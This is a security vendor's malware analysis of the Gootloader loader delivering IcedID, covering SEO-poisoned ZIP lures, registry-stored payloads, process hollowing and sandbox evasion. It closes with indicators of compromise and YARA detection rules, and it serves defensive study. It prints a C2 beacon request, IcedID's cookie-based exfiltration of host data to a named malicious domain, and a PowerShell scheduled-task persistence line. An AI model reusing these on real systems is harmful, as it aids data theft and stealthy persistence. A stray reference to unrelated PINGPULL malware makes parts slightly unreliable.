What We Do
How We Do
Get Started

eSentire Threat Intelligence Malware Analysis: Gootloader and IcedID

BY eSentire Threat Response Unit (TRU)

July 18, 2022 | 10 MINS READ


Threat Intelligence

Threat Response Unit

TRU Positive/Bulletin

Want to learn more on how to achieve Cyber Resilience?



Gootloader is a Malware-as-a-Service (MaaS) offering that is spread through Search Engine Optimization (SEO) poisoning to distribute malicious payloads, such as IcedID. Threat actors have begun using IcedID, a former banking trojan, since it’s a stealthier option compared to Cobalt Strike.

In fact, the eSentire Threat Response Unit (TRU) team recently published a security advisory, The Popular Malware Downloader, GootLoader, Expands its Payloads Yet Again, Infecting a Law Firm with IcedID, that outlined TRU’s discovery of threat actors deploying IcedID onto a law firm’s IT environment via an employee’s computer. However, our team of 24/7 Cyber SOC Analysts immediately isolated the infected endpoint and worked with TRU to diagnose the malware as IcedID after cleaning the endpoint.

This malware analysis is a deeper technical dive of how Gootloader and IcedID are deployed and our security recommendations to protect your organization from being exploited.

Key Takeaways

  • Gootloader is a sophisticated malware, which, upon communication with a C2 server, serves the second-stage payload only for machines that are a part of the Active Directory.
  • The threat actor(s) has been switching between delivering Cobalt Strike and IcedID as a second-stage payload. eSentire’s Threat Response Unit (TRU) team assesses with high confidence that threat actors are delivering IcedID, instead of Cobalt Strike as a second stage, as it is a stealthier option to avoid the detection.
    • Gootloader has been observed dropping Cobalt Strike payloads under HKCU\SOFTWARE\Microsoft\Phone\username0, HKCU\SOFTWARE\Microsoft\Phone\username (username0)
    • Gootloader has been observed dropping IcedID payloads under HKCU\SOFTWARE\Microsoft\username (username0)
  • Gootloader is using a process hollowing technique to inject IcedID loader into PowerShell processes. PowerShell can be used for legitimate process running in the background; thus, Gootloader infections can go unnoticed.
  • To secure your organization against PINGPULL, eSentire’s Threat Response Unit (TRU) team recommends:
    • Implement a Phishing and Security Awareness Training (PSAT) program that educates & informs employees on emerging threats in the threat landscape.
    • Confirm that all devices are protected with Endpoint Detection and Response (EDR) solutions.
    • Address security issues in Active Directory by thoroughly reviewing and securing SYSVOL permissions, patching any known vulnerabilities, implementing Least-Privilege administrative models.
    • Ensure standard procedures are in place for employees to submit potentially malicious content for review.

Case Study

eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain joined machines. The infection starts with the user visiting the infected website with a lure to download a ZIP file. The ZIP archive contains the JavaScript malicious file that is responsible for reaching out to one of three hardcoded domains to retrieve the second-stage payload.

Gootloader and IcedID Technical Analysis

As mentioned previously, the infection starts when a user visits an infected website and downloads a ZIP archive which contains a highly obfuscated malicious JavaScript file. The filename in most cases includes the keyword “agreement”. Gootloader leverages SEO poisoning to deliver the initial payload as shown in Exhibit 1.

Exhibit 1: Gootloader leveraging SEO poisoning to deliver the initial payload

When visiting one of the many compromised websites, the user is served with a Gootloader landing page that includes the link to the malicious ZIP archive (Figure 2). Since the user’s location and browser information is recorded during the visit, if the user visits a subsequent infected webpage, they will not be served with another Gootloader payload.

Exhibit 2: Gootloader's landing page

The JavaScript file within the ZIP archive decodes itself during the runtime and reaches out to one of the three hardcoded compromised websites.

The script checks if the infected host is a part of the Active Directory domain by using the environment variable %USERDNSDOMAIN%, the variable contains the FQDN (fully qualified domain name) of the computer. If the infected host successfully logs on to one of the malicious domains, the value “4173581” appends to the URL GET request that gets sent to the C2 server. If one of the C2 servers provided in the L parameter doesn’t respond with status code 200, the script sleeps for 23.232 seconds (23232 milliseconds) and attempts to connect to the next URL (Exhibit 3).

The GET request (on a domain joined machine):

GET /test.php?cvtbyyxsqwsw=201492074208614154173581 HTTP/1.1
Connection: Keep-Alive
Accept: */*    
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www[.]liveshopping-aktuell[.]de
Exhibit 3: Part of the decoded malicious JavaScript file

Upon the successful communication with the C2 channel, Gootloader serves the second-stage payloads to the infected host from one of the infected websites in less than 2 minutes from the execution of the JavaScript file. The first main encoded payload is written to the registry key under HKEY_CURRENT_USER\SOFTWARE\Microsoft\username\ via Wscript process using RegWrite Method (Exhibits 4-5).

Exhibit 4: Second-stage main payload

Exhibit 5: Second-stage main payload (registry view)

The second payload is written to HKEY_CURRENT_USER\SOFTWARE\Microsoft\username0\ (Exhibit 6). The payload is a 32-bit DLL (Dynamic Link Library) written in C# and is named as powershell.dll. The C# payload is responsible for decoding the main payload by replacing the ASCII characters with numeric values within Test() Class (Exhibit 7).

Exhibit 6: Second payload (registry view)

Exhibit 7: C# DLL payload responsible for decoding the main payload

eSentire TRU previously observed Gootloader writing Cobalt Strike payloads under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username0\ and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username\ registry keys.

Gootloader uses process hollowing techniques (i.e., replacing the legitimate executable section of the process with a malicious code by hollowing or unmapping its memory) to inject the main payload into the PowerShell process via Foad() Class using APIs such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory and ResumeThread as shown in Exhibit 8. Previously, GootLoader was observed to inject the payloads into ImagingDevice.exe process.

Exhibit 8: Process Hollowing technique used by GootLoader

In some cases, we have observed the scheduled task is created as a persistence mechanism to decode the registry values by replacing “#” with “1000” and reflectively loads the second decoder payload in-memory. The script is base64-encoded and executed via PowerShell (Exhibits 9-10).

Exhibit 9: Base64-encoded PowerShell script

Exhibit 10: Loading .NET payload in-memory (base64-decoded PowerShell script)

The following code block responsible for creating the scheduled task (the scheduled task is named after the username):

$yl=$env:USERNAME;Register-ScheduledTask $yl -In (New-ScheduledTask -Ac 
(New-ScheduledTaskAction -E $ibs -Ar $zb) -Tr (New-ScheduledTaskTrigger -AtL -U $yl))

eSentire TRU was able to identify the main payload as IcedID.

IcedID Analysis

The sample was compiled on May 25th, 2022, which was 5 days before the infection. The packed sample is 147 KB in size (MD5: 157d12885e5f6434436862aadd6224cd). The executable was compiled using MingW GCC. The unpacked sample is only 16 KB in size (MD5: 578143ef946796590c0dd5f5dcfdada7).

IcedID performs anti-VM/anti-sandboxing techniques to check if it’s running in a sandbox environment using RDTSC (Read Time Stamp Counter) instruction to get a processor’s time stamp counter as well as CPUID, SwitchToThread instructions with a loop for an accurate measurement during the calculation of the execution times (Exhibit 11).

Exhibit 11: Sandbox evasion technique

IcedID gathers the information on the infected machine and transfers it via the Cookie parameter with GET request as shown below:

GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=1073741824:1:352:136; __gat=10.0.19043.64; _ga=1.591597.1635208534.1946; _u=4445534B544F502D5043373941514B:73616C6573; __io=21_3122393604_3742086262_449295377; _gid=0068595A4472
Host: ilekvoyn[dot]com

Breakdown of the Cookie parameters:

Exhibit 15: Retrieving the network adapter information

After successfully connecting to the C2 server, IcedID drops the payload in ProgramData folder (Exhibits 16-17).

Exhibit 16: Placing the payload under ProgramData (1)

Exhibit 17: Placing the payload under ProgramData (2)

As we can see, the unpacked IcedID payload is relatively small, but it contains the capabilities that threat actor(s) need to deploy a secondary payload from the C2 server. IcedID was observed to deliver Cobalt Strike, Conti ransomware, Quantum ransomware, and XingLocker ransomware in the past.

How eSentire is Responding

Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create positive security outcomes for our customers. We take a holistic approach to combat modern cybersecurity threats by deploying countermeasures, such as:

Our detection content is supported by investigation runbooks, ensuring our 24/7 Cyber SOC Analysts respond rapidly to any intrusion attempts related to a known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.

Recommendations from eSentire’s Threat Response Unit (TRU) 

We recommend implementing the following controls to help secure your organization against Gootloader and Iced ID malware:

While the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.

eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.

Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.


Indicators of Compromise

Name Indicators
IcedID packed payload 157d12885e5f6434436862aadd6224cd
IcedID unpacked payload 578143ef946796590c0dd5f5dcfdada7
IcedID C2 ilekvoyn[dot]com
Gootloader C2 www[dot]liveshopping-aktuell[dot]de
Gootloader C2 www[dot]lightnessofbeing[dot]net
Gootloader C2 www[dot]lintelconsulting[dot]co[dot]uk
employee confidentiality agreement texas(9898).zip - Gootloader initial payload (ZIP archive) 1c822f5a7d92307f9cf8ad5f28f61a76
employee_confidentiality_agreement_texas 19855.js - Gootloader initial payload (JavaScript file) c6bac95375b8c7fb3b16c7dff98d2cc0
IcedID campaign ID 277708695

Yara Rules

Yara Rules

rule gootloader_JS {
        description = "Detects Gootloader JavaScript file"
        author = "eSentire TI"
        date = "06/13/2022"
        $a = "w+"
        $a1 = "x\\"
        $a2 = "Sp"
        $a3 = "E\\"
        $a4 = "function"
        $a5 = "while"
        all of ($a*) and filesize < 300KB
rule IcedID_loader {
        description = "Detects IcedID loader"
        author = "eSentire TI"
        date = "06/13/2022"
        $a = "oCookie: _s=" wide fullword nocase
        $a1 = "Cookie: __gads=" wide fullword nocase
        $a2 = "oCookie: _s=" wide fullword nocase
        $a3 = "__io=" wide fullword nocase
        $a4 = {63 3A 5C 50 72 6F 67 72 61 6D 44 61 74 61 5C}
        $a5 = {3B 00 20 00 5F 00 67 00 61 00 3D}
        $a6 = {3B 00 20 00 5F 00 67 00 69 00 64 00 3D}
        $a7 = {3B 00 20 00 5F 00 67 00 61 00 74 00 3D}
        all of ($a*) and filesize < 20KB
eSentire Threat Response Unit (TRU)
eSentire Threat Response Unit (TRU)

The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.

Read the Latest from eSentire